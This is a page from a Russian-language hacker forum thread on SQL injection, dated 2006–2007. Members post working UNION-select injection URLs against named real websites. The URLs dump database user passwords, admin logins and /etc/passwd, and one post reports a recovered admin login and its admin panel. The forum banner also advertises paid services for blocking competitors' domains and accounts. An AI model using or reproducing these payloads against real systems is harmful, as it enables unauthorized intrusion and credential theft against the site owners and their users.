Форум АНТИЧАТ - SQL Инъекции

ANTICHAT.XYZ

VIDEO.ANTICHAT.XYZ

НОВЫЕ СООБЩЕНИЯ

ФОРУМ

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
SQL Инъекции

Страница 1222 из 1239

1222

Опции темы

Поиск в этой теме

Опции просмотра

09.10.2006, 21:23

Goudini

Участник форума

Регистрация: 07.06.2006

Сообщений: 146

Провел на форуме:
1652093

Репутация: 490

Отправить сообщение для Goudini с помощью ICQ

Цитата:

Сообщение от _Pantera_

http://arenda.kvartir.ru/index.php?cat=1-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13 ,14/*

http://arenda.kvartir.ru/index.php?cat=1-1%20union%20select%201,2,3,4,5,6,7,8,concat(user,% 22:%22,password),10,11,12,13,14+from+mysql.user/*

А вот и рут нашелся

http://arenda.kvartir.ru/index.php?cat=1-1%20union%20select%201,2,3,4,5,6,7,8,LOAD_FILE('/etc/passwd'),10,11,12,13,14+from+mysql.user/*

Последний раз редактировалось Goudini; 09.10.2006 в 21:30.. Причина: LOAD_FILE('/etc/passwd')

20.12.2006, 22:42

DIAgen

Познавший АНТИЧАТ

Регистрация: 02.05.2006

Сообщений: 1,191

Провел на форуме:
7364332

Репутация: 1276

http://www.cycling.from.kz/theme.php?section=history&full=-2+union+select+1,2,333,4,5,6/*

27.01.2007, 04:08

*D1VER

Участник форума

Регистрация: 05.12.2006

Сообщений: 112

Провел на форуме:
685950

Репутация: 175

Отправить сообщение для *D1VER с помощью ICQ

Цитата:

Сообщение от [53x]Shadow

На islam.ru

http://www.islam.ru/shop/index.php?cat=-1+union+select+0,email,password,0,0+from+users/*

выяснил таблицу и нужные столбцы, но что то с выводом никак, у кого получится стучитесь в личку дальше больше....

http://www.islam.ru/shop/index.php?sample=771&good=98&cat=-1+union+select+1,2,3,4,concat(password,char(58),id ,CHAR(194,206,210,32,194,219,194,206,196,33))+from +users+limit+0,1/*
Без пробелов!

19.02.2007, 19:32

}{0TT@БЬ)Ч

Постоянный

Регистрация: 20.01.2006

Сообщений: 302

Провел на форуме:
3536885

Репутация: 447

Цитата:

Сообщение от [sql]

Код:

http://www.bamba.ru/product.asp?view=1+or+1=(SELECT+TOP+1+cast(email+as+nvarchar)%2B%27%3A%27%2Bcast(login+as+nvarchar)%2B%27%3A%27%2Bcast(password+as+nvarchar)+from+MEMBER+where+member_id=10)--

и че это?

20.02.2007, 00:57

ice1k

Постоянный

Регистрация: 01.01.2007

Сообщений: 551

Провел на форуме:
4908597

Репутация: 1866

Отправить сообщение для ice1k с помощью ICQ

Код:

http://www.bulgaria.by/rus/index.php?text_id=-99+union+select+concat(login,0x3a,pwd)+from+user+limit+0,1/*

22.02.2007, 19:06

InferNo23

Участник форума

Регистрация: 05.09.2006

Сообщений: 187

Провел на форуме:
6860213

Репутация: 378

www.Tetis-Pro.ru

Код:

http://www.tetis-pro.ru/?menu_id=&page_id=-1+union+select+1,2,login,pass,5,6,7,8,9+from+users+limit+0,1/*

admin:xxx
http://www.tetis-pro.ru/admin

Код:

http://www.iriscom.ru/index.php?page_id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13/*

22.02.2007, 19:07

злюка

Постоянный

Регистрация: 11.11.2005

Сообщений: 317

Провел на форуме:
2848854

Репутация: 409

Отправить сообщение для злюка с помощью ICQ

Цитата:

Сообщение от swat

сорь не знал....

это я к тому, что админам пох))

27.02.2007, 22:48

}{0TT@БЬ)Ч

Постоянный

Регистрация: 20.01.2006

Сообщений: 302

Провел на форуме:
3536885

Репутация: 447

Цитата:

Сообщение от _Pantera_

http://www.solyaris.ru/rinok_hi-fi/statyi_testi_obzory/?part=1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13 ,14,15+from+INFORMATION_SCHEMA.COLUMNS--
к сожалению я ниче вытянуть не смог((
зы Кто сможет напишите в личку

юзай limit,char и будет тебе счастье

Последний раз редактировалось }{0TT@БЬ)Ч; 27.02.2007 в 22:51..

01.03.2007, 23:43

Grey

AMA - Level 2

Регистрация: 10.06.2006

Сообщений: 1,113

Провел на форуме:
17668503

Репутация: 5826

__http://www.ergo-line.ru/operative/sng/?saleID=-1+union+select+1,2,concat(user(),char(58),database (),char(58),version()),4,5,6,7,8,9,10,11,12/*

__http://www.vechnayamolodost.ru/index2.php?idtopmenu=2&idsubmenu=-133+union+select+1,2,3,concat(user,char(58),passwo rd),5,6,7,8,9,0,11,12,13,14+from+mysql.user/*

#10

02.03.2007, 23:17

Grey

AMA - Level 2

Регистрация: 10.06.2006

Сообщений: 1,113

Провел на форуме:
17668503

Репутация: 5826

Смотрим имена таблиц:

__http://www.sportobzor.ru/index.php?id=55&page=-1+union+select+1,2,3,4,table_name,6,7,8,9,10,11,12 ,13+from+INFORMATION_SCHEMA.TABLES+limit+16,1/*

Пароль и логин админа:

__http://www.sportobzor.ru/index.php?id=55&page=-1+union+select+1,2,3,4,concat(username,char(58),pa ssword),6,7,8,9,10,11,12,13+from+admin/*

Страница 1222 из 1239

1222

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая	k00p3r	Чужие Статьи	0	13.06.2005 11:26
SQL инъекция и Oracle, часть 2	k00p3r	Чужие Статьи	0	13.06.2005 11:24
Sql инъекция и Oracle, часть первая	k00p3r	Чужие Статьи	0	13.06.2005 11:23
Внедрение Sql кода с завязанными глазами	k00p3r	Чужие Статьи	0	12.06.2005 20:48
SQL Injection в Oracle	k00p3r	Чужие Статьи	0	12.06.2005 12:41

Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)

Быстрый переход

ANTICHAT.XYZ